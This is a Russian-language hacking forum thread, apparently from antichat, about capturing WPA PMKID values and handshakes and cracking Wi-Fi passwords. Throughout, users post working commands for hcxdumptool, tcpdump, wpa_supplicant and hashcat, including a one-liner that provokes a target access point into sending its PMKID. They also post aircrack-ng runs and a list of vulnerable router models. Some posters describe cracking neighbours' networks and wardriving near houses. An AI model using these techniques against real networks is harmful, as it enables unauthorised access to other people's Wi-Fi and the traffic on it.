failed to restore old SIOCSIFFLAGS and to bring interface up: No such device
root@kali:~#
Перезапускать down up пробовал, убивать процессы тоже (check kill)
Кто что может подсказать?
root@kali:~# hcxdumptool -i wlan0mpn -opmkid/capture.pcapng --enable_status=15
SEGA_1986
11.11.2019, 00:08
вот я даю... невнимательность и спешка... ещё пробел забыл (-o pmkid)
всё работает, на 2х адаптерах.
SEGA_1986
13.11.2019, 22:56
Адаптер RaLink3070.
Точек много (30+), сигнал отличный (-44 -46), pmkid всего 4 поймал за 2 дня (все 4 подобраны, пароли найдены, ошибок нет)
Роутеры - Asus RT10 RT12 и TP-Link (какой - хз, вываливается новая веб морда с вводом ЭЛ.почты и пароля)
Но что-то маловато...
SEGA_1986
14.11.2019, 11:45
Это потому чтоМои адаптеры на этом чипе давно лежат на полке, выбросить лень, продать тоже (стОят копейки), поэтому лежат про запас (сойдут на крайняк). Рекомендую присмотреться к альфе NHA (на ar9271).
Не, я про pmkid) что-то их мало, на 30-40 точек - всего 4 pmkid. Пусть даже не рабочие или пустые будут, но нет, всего 4...
А точек то норм) Живу просто в таком районе где 1 пятиэтажка.
Monohrom
26.01.2020, 23:52
Кому лень читать всю тему + часть моих дополнений
1.
Иногда нужно словить pmkid, а адаптера с монитор модом нет под рукой, можно словить pmkid на смартфоне (нужны рут права) вот общая инструкция:
Как известно, для атаки требуются следующие данные:
1) PMKID;
2) BSSID целевой точки;
3) MAC-адрес клиента (в данном случае MAC-адрес Wi-Fi моего смартфона);
4) ESSID целевой точки.
Данные под номерами 2, 3 и 4 мы знаем, а PMKID вытаскиваем вручную из файла захвата Tcpdump с помощью WireShark
После этого всего мы составляем текстовый файл вида:
***
и сохраняем его как file.16800. Этот файл уже можно ломать с помощью Hashcat
Но если нам требуется, чтобы он ломался через Aircrack-Ng, нужно переконвертировать его в .cap. Для этого устанавливаем утилиты: https://github.com/ZerBea/hcxtools и конвертируем наш файл командой: hcxhash2cap --pmkid file.16800 -c file_aircrack.cap
Взято из недр форума спасибо @4Fun (https://forum.antichat.xyz/members/324235/)
2.
Судя по описанию можно ловить pmkid используя wpa_supplicant в режиме отладки
https://github.com/Sinf0r0s0/pmkid-auto (скрипт бажный)
инфа по поводу ловли pmkid с помощью wpa_supplicant
https://www.wifi-libre.com/topic-1144-revolucion-en-el-crack-wpa-ataque-por-diccionario-contra-pmkid-page-2.html#p11773
3.
Ловля PMKID из под Windows
1. Запустить Wireshark
2. Включить режим монитора - wlanhelper {guid} mode monitor
3. Запустить захват 802.11 пакетов
4. Выключить режим монитора - wlanhelper {guid} mode managed (не останавливая захват пакетов)
5. Подключиться к нужной сети с любым паролем - EAPOL Key 1 поймает
Взято из недр форума спасибо @binarymaster (https://forum.antichat.xyz/members/148032/)
4.
В консоли: tcpdump -nei wlan0 -s0 -xx
если нужно сохранить файл то опция -w file.cap
отфильтровать только EAPOL пакеты - в конце добавить ether proto 0x888e
Суть в том, что свои EAPOL пакеты видны на wi-fi интерфейсе и без режима монитора.
Cмотреть вывод logcat. У там проскакивают пары bssid + essid, соответственно можно их скриптом выковыривать. Примерно так:
logcat -d | perl -nle 'BEGIN{undef $/;} for(/line=bssid=\K(\S+.+?ssid=[^\n]+)/sg) {print "$1 ".unpack("H*", $2)." ($2)" if /^(\S+).+?ssid=(.+)/s}'
Взято из недр форума спасибо @VasiliyP (https://forum.antichat.xyz/members/172247/)
5
ссылка на tcpdump
https://www.androidtcpdump.com/android-tcpdump/downloads
6.
По PMKID
Пока что список уязвимого следующий:
Mikrotik Routerboard (есть галочка отключить pmkid)
Cisco точки доступа
Tenda (ralink chipset)
Netis, totolink, asus rt-n10/n12, huawei ws319 под вопросом (pmkid = 00000000..) (realtek chipset)
Dlink DSL-2640U 96333AWG_F7S, Dsl-2650u (broadcom chipset)
ASUS RT-N10U, RT-N18U (broadcom chipset)
Dlink DIR-615 (broadcom chipset)
Netgear WNR1000v3.
TP-LINK (Broadcom)
Взято из недр форума спасибо
@TOX1C (https://forum.antichat.xyz/members/194216/) за список и @VasiliyP (https://forum.antichat.xyz/members/172247/) (TP-LINK)
после конвертации pmkid2cap пароль нужно брутить только новыми аиркряком,
Новый aircrack-ng 1.6 уже работает с PMKID.
aircrack-ng -I <hash PMKID> -w diccionario
aircrack-ng -I 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89ac f0e761f4*ed487162465a774bfba60eb603a39f3a -w password.txt
Если кому надо для коллекции конвертер pmkid2cap под Windows, cкомпилил в Cygwin.
http://wdfiles.ru/rnGZ
hcxpcaptool. под виндовс есть ?
hcxpcaptool. под виндовс есть ?
https://wdho.ru/lQk1
Судя по описанию можно ловить pmkid используя wpa_supplicant в режиме отладки
https://github.com/Sinf0r0s0/pmkid-auto (скрипт бажный)
где именно бажный? планирую на своем андроиде использовать.
eurosanya
23.03.2020, 15:11
Чисто для себя запилил в стандартный win GUI Hashcat 1.1 beta 0 от сюда: https://hashkiller.co.uk/hashcat-gui.aspx
поддержку формата 16800 PMKID.
Скачать можно тут:
http://zalil.su/6856679
Замените в ГУЕ в папке config файл hash-modes.xml на мой из ссылки выше, и будет вам счастье.
У кого есть возможность, выложите на другой обменник. zalil.su не отдает файл.
У кого есть возможность, выложите на другой обменник. zalil.su не отдает файл.
hash-modes.xml
Ребята не могу поставить hcxdumptool при установке ругается на отсутствии
Openssl/evp.h
установлена kali 2017.2 репозиторий обновлял. Но не помогло.
Ребята не могу поставить hcxdumptool при установке ругается на отсутствии
Openssl/evp.h
установлена kali 2017.2 репозиторий обновлял. Но не помогло.
поставьте libssl-dev
apt install libssl-dev
поставьте libssl-dev
apt install libssl-dev
Е: не удалось найти пакет libssl-dev.
Видать не так обновлял. Пробовал
sudo apt upgrade
система ругается на нехватку памяти, хотя выделено 10гб
Е: не удалось найти пакет libssl-dev.
Видать не так обновлял. Пробовал
sudo apt upgrade
система ругается на нехватку памяти, хотя выделено 10гб
у вас 10Гб свободного места
df -h
или под операционку 10Гб (этого маловато будет)?
у вас 10Гб свободного места
df -h
или под операционку 10Гб (этого маловато будет)?
Под операционку делал, не думал, что мало будет, ставил давно. Нет варианта вручную поставить ssl, чтобы весь репозиторий не качать?
Под операционку делал, не думал, что мало будет, ставил давно. Нет варианта вручную поставить ssl, чтобы весь репозиторий не качать?
можно конечно, попробуйте поискать пакеты
apt search ssl-dev
или же можете посмотреть от каких других библиотек зависит openssl
apt show openssl | grep Depends
допустим у меня вылазит "Depends: libc6 (>= 2.15), libssl1.1 (>= 1.1.1)" -> значит вам надо установить libssl-dev
dart8888
24.04.2020, 06:59
Заметил, что Pmkid от роутера получить гораздо проще чем от клиента ХШ, ну оно и понятно - передатчик роутера гораздо мощнее, и к примеру из 80 сетей в WIFITE ловит предпоследние со слабым сигналом в 8db - не говоря уже о хш, который вообще не поймаешь при таком сигнале. Но вот беда - что WIFITE не показывает доп.окно в терминале, что бы посмотреть что он там делает, В отличии от airgeddon в котором хоть видно как ловится ПМКИД, но опять же неудобство есть и в нём - ВСЕХ СКОПОМ не зацепишь - в отличии от первого(( вот и приходится маятся - по 200раз всё по кругу тыкать))) капец)
и да.. вопрос возник: механизмы у этих утилит разные чтоли? Почему то там, где ловит Wifite там airgeddon не может поймать и наобарот! Отдаю предпочтение последнему - там хоть виден процесс ловли..
erwerr2321
24.04.2020, 10:48
Чё за Вифитэ, что за ангедон?
Я всегда говорил и дальше буду, что ХШ нужно ловить по старинке вручную airodump-ng + aireplay-ng из двух разных консолей.
Всё остальное ерунда и баловство.
dart8888
30.04.2020, 23:33
Чё за Вифитэ, что за ангедон?
Я всегда говорил и дальше буду, что ХШ нужно ловить по старинке вручную airodump-ng + aireplay-ng из двух разных консолей.
Всё остальное ерунда и баловство.
ну тут как бы... много вводить надо ручками) - а когда ты с ноутбука ещё - и подъезжаешь к дому - и на всё про всё у тебя 5 -10 минут, готовые шаблоны команд ( в виде вифите и аиргедон ) очень выручают - не находите?
хотя согласен - что ручной метод более точен и содержателен и продуктивнее - но просто времени нет копипастами маков заниматься.
erwerr2321
01.05.2020, 00:40
а когда ты с ноутбука ещё - и подъезжаешь к дому - и на всё про всё у тебя 5 -10 минут
Прям классические вардрайверы!
Ну Вам виднее, конечно!
erwerr2321
01.05.2020, 17:18
очень выручают - не находите?
Не нахожу, конечно.
Потом эти вардрайверы с вифитями тоннами скидывают эти свои недоХШ в тему БП и, буквально, с наездами вопрошают: "Так чё, де там мои пОроли?!"
Не нахожу, конечно.
Потом эти вардрайверы с вифитями тоннами скидывают эти свои недоХШ в тему БП и, буквально, с наездами вопрошают: "Так чё, де там мои пОроли?!"
А достаточно было только прогнать рукопожатие с помощью wpaclean из пакета Aircrack-ng
Не нахожу, конечно.
Потом эти вардрайверы с вифитями тоннами скидывают эти свои недоХШ в тему БП и, буквально, с наездами вопрошают: "Так чё, де там мои пОроли?!"
Эти вифити сразу проверяют ХШ на валид. Ниразу небыло проблем
dart8888
01.05.2020, 23:51
кстати такой вопрос
*.pcapng вот только такой формат на выходе получается в hcxdumptool?
брут проги не понимают такой формат,
в лучшем варианте было бы очень хорошо если был бы формат .cap так как он включает уже в себя и обычные hs и pmkid.
подумал может Wireshark поможет, но он при сохранении в .сар говорит что будут удалены какие то коментарии, у меня подозрения что это могут быть pmkid-ы, или какие то данные о ХШ.
вопрос очевиден? как или чем конвертировать в .cap без потери данных?
кстати такой вопрос
*.pcapng вот только такой формат на выходе получается в hcxdumptool?
брут проги не понимают такой формат,
в лучшем варианте было бы очень хорошо если был бы формат .cap так как он включает уже в себя и обычные hs и pmkid.
подумал может Wireshark поможет, но он при сохранении в .сар говорит что будут удалены какие то коментарии, у меня подозрения что это могут быть pmkid-ы, или какие то данные о ХШ.
вопрос очевиден? как или чем конвертировать в .cap без потери данных?
Посмотрите в сторону пакета утилит hcxtools, может быть, там найдётся нужный инструмент.
Не могу быть уверен, но кажется, что pcapng — это сжатый с помощью gz pcap.
Andrey9999
02.05.2020, 00:20
tcpdump -r hash.pcapng -w hash.pcap
или
tshark -F pcap -r hash.pcapng -w hash.pcap
в .pcap можно конвертнуть
dart8888
04.05.2020, 09:07
мдее ужж.. месяца три перебирать будет( https://transfiles.ru/bpuvl на моём... ((
bravephoenix748
24.06.2020, 16:41
Может уже было в теме..
Cтолкнулся с интересной ситуацией на Wifislax-4.12.Ловил хендшейки а поймал PMKID.Aircrack-ng 1.6,а дрова 8812AU 5.6.4.2.
https://download.aircrack-ng.org/aircrack-ng-1.6.tar.gz
https://github.com/aircrack-ng/rtl8812au
http://f26.ifotki.info/org/201af1afc8df49fc6889870604ed252c05e469375662482.pn g
bravephoenix748
24.06.2020, 16:42
# BSSID ESSID Encryption
1 30:5A:3A:****** ASUS WPA (0 handshake, with PMKID)
Choosing first network as target.
Reading packets, please wait...
Opening /opt/Wifi_Metropolis/capture/capture-01.cap
Read 6028 packets.
1 potential targets
Building Hashcat file...
ESSID (length: 4): ASUS
Key version: 2
BSSID: 30:5A:3A******
STA: 4C:56:9D******
anonce:
C3 1F CB 8B 77 0B 57 B2 45 E4 32 24 5D 38 C2 16
EA 3A 84 35 1B 38 4F 32 9F A6 12 A5 64 83 DA 78
snonce:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Key MIC:
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
eapol:
Successfully written to /opt/Wifi_Metropolis/capture/capture-01.cap.hccap
Cтолкнулся с интересной ситуацией на Wifislax-4.12.Ловил хендшейки а поймал PMKID.Aircrack-ng 1.6,а дрова 8812AU 5.6.4.2.
Что тут интересного?Новая версия может захватывать PMKID.Но делает это как-то бестолково.Разрабы даже не удосужились нормальный парсер для PMKID запилить.Ловит 1 пакет с нулевым RSN PMKID и зачем-то об этом "докладывает".
Cтолкнулся с интересной ситуацией на Wifislax-4.12.Ловил хендшейки а поймал PMKID.Aircrack-ng 1.6,а дрова 8812AU 5.6.4.2.
В будущем можете ловить PMKID более простым способом без режима мониторинга с помощью wpa_supplicant:
wpa_passphrase "" somepassword | sudo wpa_supplicant -i wlan0 -dd -c /dev/stdin | grep "PMKID f" -m 1
Это позволит вам видеть значение PMKID, что даст судить о его валидности.
bravephoenix748
24.06.2020, 21:04
В будущем можете ловить PMKID более простым способом без режима мониторинга с помощью wpa_supplicant:
wpa_passphrase "<ESSID>" somepassword | sudo wpa_supplicant -i wlan0 -dd -c /dev/stdin | grep "PMKID f" -m 1
Это позволит вам видеть значение PMKIяD, что даст судить о его валидности.
Да наоборот, так вроде удобнее-я ведь не ловлю именно PMKID.Что первое попадётся или PMKID или Хендшейк.
Ребят в файле File.16800 для того чтобы скормить коту нужно лишнее убирать, к примеру BSSID, ESSID?
Ребят в файле File.16800 для того чтобы скормить коту нужно лишнее убирать, к примеру BSSID, ESSID?
Не нужно
Всё ли я правильно делаю для pmkid, если не знаю длину пароля, задал от 9 до 10 символов и маску. По времени показывает 4 года на все про все))
sudo hashcat -m 16800 test.16800 -a 3 -o oss.txt -i --increment-min 9 --increment-max 10 ?l?l?l?l?l?l?d?d?d?d
bravephoenix748
10.08.2020, 16:56
Что тут интересного?Новая версия может захватывать PMKID.Но делает это как-то бестолково.Разрабы даже не удосужились нормальный парсер для PMKID запилить.Ловит 1 пакет с нулевым RSN PMKID и зачем-то об этом "докладывает".
Я протестил захват PMKID с помощью aircrack-ng-не всё так плохо.WifiSlax 4.12 программа WifiMetrropolis
Только один из 4-5 PMKID оказался пустой.Но зато на выходе мы имеем PMKID файл формата .сар который можно вставлять в WirelessPassRecovery версии 6.0+
Вот смотрите этот Sercom упорно выдавал пустой PMKID-я ловил 5-6 раз и всё время он был пустой.
Там должно быть написано 0 handshake with PMKID или handshake with PMKID
http://i-fotki.info/26/08c48618b9e431f14bc7ddb57f8860906dad4e379724109.jp g.html
Пришлось использовать GoyScriptWpa там встроенный aircrack-ng версии 2.
http://i-fotki.info/26/0278f123e3042bc6cc23f2e82e62efe06dad4e379724210.pn g.html
Так PMKID нормально ловит а главное очень быстро только проверяйте выходной файл.Чтобы был не пустой PMKID.В терминале командой aircrack-ng XXX.cap.
Многие советуют использовать командную строку-говорят нормальные люди всё делают в командной строке итд.
А если занимаешься этим на улице?И мороз 10-15 градусов.Я посмотрю как они будут набирать в командной строке каждую команду
этот Sercom упорно выдавал пустой PMKID-я ловил 5-6 раз и всё время он был пустой.
А на 7 раз он вдруг появился?
Если pmk в первом пакете нет,то это значит,что его нет и не будет ни на какой раз.Ни на 7 ни на 100500ый.
Я протестил захват PMKID с помощью aircrack-ng-не всё так плохо.
А я разве говорил что это плохо?
Пришлось использовать GoyScriptWpa там встроенный aircrack-ng версии 2
Разрабы гойскрипта свой aircrack чтоли пилят?На офф сайте,версия 1.6
bravephoenix748
10.08.2020, 18:16
А на 7 раз он вдруг появился?
Если pmk в первом пакете нет,то это значит,что его нет и не будет ни на какой раз.Ни на 7 ни на 100500ый.
А я разве говорил что это плохо?
Разрабы гойскрипта свой aircrack чтоли пилят?На офф сайте,версия 1.6
Да вот именно aircrack-ng 1.6 пишет PMKID found-= а он пустой
В Goyscript там старый используется(может патченный)- он в папке с программой этой.Зато работает чётко без пустых хендшейков а новыый 1.6 версии иногда не только PMKIDы даёт пустые но и хендшейки тожее бывает...Да они его уже не обновляют.
GoySript wpa ловля хендшейков запускается с параметром-что так легче ловится?
killall -q xterm ifconfig dhcpcd dhclient dhclient3 NetworkManager wpa_supplicant udhcpc airbase-ng >/dev/null 2>&1
Это я из скрипта выпилил...
Wifislax из последней версии убрали GoyScript и WifiMetropolis.Хорошие программы тк работают с 8812au.Наверное под Kali косят.Зачем убрали непонятно?.Кстати их можно выпилить и вставить в свою сборку Porteus 32 bit
Да вот именно aircrack-ng 1.6 пишет PMKID found-= а он пустой
Aircrack-ng, к сожалению, не проверяет PMKID на валидность, то есть не состоит ли он из нулей; это здесь обсуждалось.
С тех пор, как я узнал, что PMKID можно ловить без режима мониторинга, всегда ловлю его так и проблем не знаю.
bravephoenix748
22.09.2020, 20:31
Что ,просто ввести в терминале эту команду вписав ESSID цели?А ждать долго и виден ли процесс этой команды?Мне нравится начинать с aircrack-ng- там сразу видно поймаете вы PMKID или нет.И там всё видно как идёт процесс.Короче если там за 30 секунд не прийдёт PMKID то он не прийдёт вообще.Ваш вариант как дополнительный если aircrack-ng не ловит.Это как начинать перебор с 8 значных цифер-с самого простого те.
В будущем можете ловить PMKID более простым способом без режима мониторинга с помощью wpa_supplicant:
wpa_passphrase "<ESSID>" somepassword | sudo wpa_supplicant -i wlan0 -dd -c /dev/stdin | grep "PMKID f" -m 1
Это позволит вам видеть значение PMKID, что даст судить о его валидности.
Что ,просто ввести в терминале эту команду вписав ESSID цели?
Да, именно так
А ждать долго и виден ли процесс этой команды?
При должном сигнале ждать совсем недолго, т.к. эта методика заключается в провоцировании роутера отдать PMKID, то есть wpa_supplicant инициализирует подключение с паролем "somepassword". При очень слабом сигнале — можно не ждать: не получится.
Мне нравится начинать с aircrack-ng- там сразу видно поймаете вы PMKID или нет
Airodump-ng захватывает PMKID в пассивном режиме (если без aireplay-ng, mdk4 и др.) при подключении какого-либо валидного/невалидного клиента. Жирный минус в том, что даже если вы захватили PMKID, вы не знаете, валидный ли он, т.к. airodump-ng не отображает его и не проверяет его, не состоит ли он из нулей.
Короче если там за 30 секунд не прийдёт PMKID то он не прийдёт вообще
Это не совсем верно. PMKID часто содержится только в пакетах EAPOL, которые можно словить при аутентификации клиента. А если клиентов нет, то и PMKID не ждите. Если ловить с помощью wpa_supplicant, то не нужны клиенты, т.к. вы выступаете в роли клиента, который пытается подключиться и провоцирует точку отправить пакеты EAPOL.
Всем привет!
Кто нибудь может пожалуйста пошагово помочь словить хэндшейк с приминением PMKID?
Очень нужна помощь, читал много в сети но ничего не понял.
Тут в теме выкладывали модули для WifiSlax 4.12 hcxdumptool.xzm и hcxpcaptool.xzm
Кинул на флешку с WifiSlax в папку base, при загрузке с флешки можно видеть что модули загрузились.
Набрал в консоли sudo hcxdumptool -I
Получил строку
Suitable wlan inerfaces:
Interface : wlan0 [mac addres]
А что дальше, ничего не пойму.
Как перейти в режим сканирования?
Как выбрать цель?
И как запустить процесс?
Могли бы пожалуйста пошагово объяснить?
Очень прошу!
@Dee Jay (https://forum.antichat.xyz/members/272788/) сначала предлагаю вам к прочтению статьи, написанные действительно талантливым оратором, если будут вопросы, то зададите:
https://hackware.ru/?p=6672
https://hackware.ru/?p=6700
Также попробуйте захватить простым способом без режима мониторинга:
https://forum.antichat.ru/threads/464369/page-12#post-4396194
irina001
27.09.2020, 20:59
В будущем можете ловить PMKID более простым способом без режима мониторинга с помощью wpa_supplicant:
wpa_passphrase "<ESSID>" somepassword | sudo wpa_supplicant -i wlan0 -dd -c /dev/stdin | grep "PMKID f" -m 1
Это позволит вам видеть значение PMKID, что даст судить о его валидности.
Эта команда ловит pmkid(если да, то где найти файл) или проверяет валидность?
Эта команда ловит pmkid(если да, то где найти файл) или проверяет валидность?
Выводит в стандартный поток вывода (stdout), то есть печатает в консоль. Проверить на валидность очень просто: строка не должна состоять из нулей.
irina001
27.09.2020, 21:23
Выводит в стандартный поток вывода (stdout), то есть печатает в консоль. Проверить на валидность очень просто: строка не должна состоять из нулей.
Выводит в консоль значение pmkid, ясно.
irina001
27.09.2020, 21:31
Airodump-ng захватывает PMKID в пассивном режиме (если без aireplay-ng, mdk4 и др.) при подключении какого-либо валидного/невалидного клиента. Жирный минус в том, что даже если вы захватили PMKID, вы не знаете, валидный ли он, т.к. airodump-ng не отображает его и не проверяет его, не состоит ли он из нулей.
В акуле же можно узнать валидный он или нет, просто потом aircrack не показывает что там есть pmkid почему-то
Кто-нибудь готов мне по-этапно как ничего не знающему объяснить порядок действий?
Очень прошу, очень надо!
Кто-нибудь готов мне по-этапно как ничего не знающему объяснить порядок действий?
Очень прошу, очень надо!
Тут вполне доступно и по русски:
PSYDRUGS
29.09.2020, 14:32
Подскажите, в каком формате добавлять PMKID в проект программы Wireless Password Recovery 6.2.8.688?
Скопировал строчки PMKID из программы hcxdumptool в текстовый файл. Кстати, что обозначает строка: PMKIDROGUE?
Получилось например: 23:36:20 6 7802f8209cd0 344b5017ffba mgts_85 [PMKID:7efc0aa4901f0a9fd9c70b691711e2a9 KDV:2]
Оставляю только строку: 7efc0aa4901f0a9fd9c70b691711e2a9. Но в формате PMKID 4 поля, разделенные символом *.
Откуда брать остальные данные? При каждом запуске hcxdumptool, PMKID меняется, разве ключ WPA не постоянный?
С "котом" не дружу, мне бы получить реальный PMKID и скормить его виндовой WPR, хендшейк не всегда возможно словить.
Подскажите, в каком формате добавлять PMKID в проект программы Wireless Password Recovery 6.2.8.688?
в текстовом
Откуда брать остальные данные?
структура здесь
https://forum.antichat.ru/threads/464369/page-2#post-4238069
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot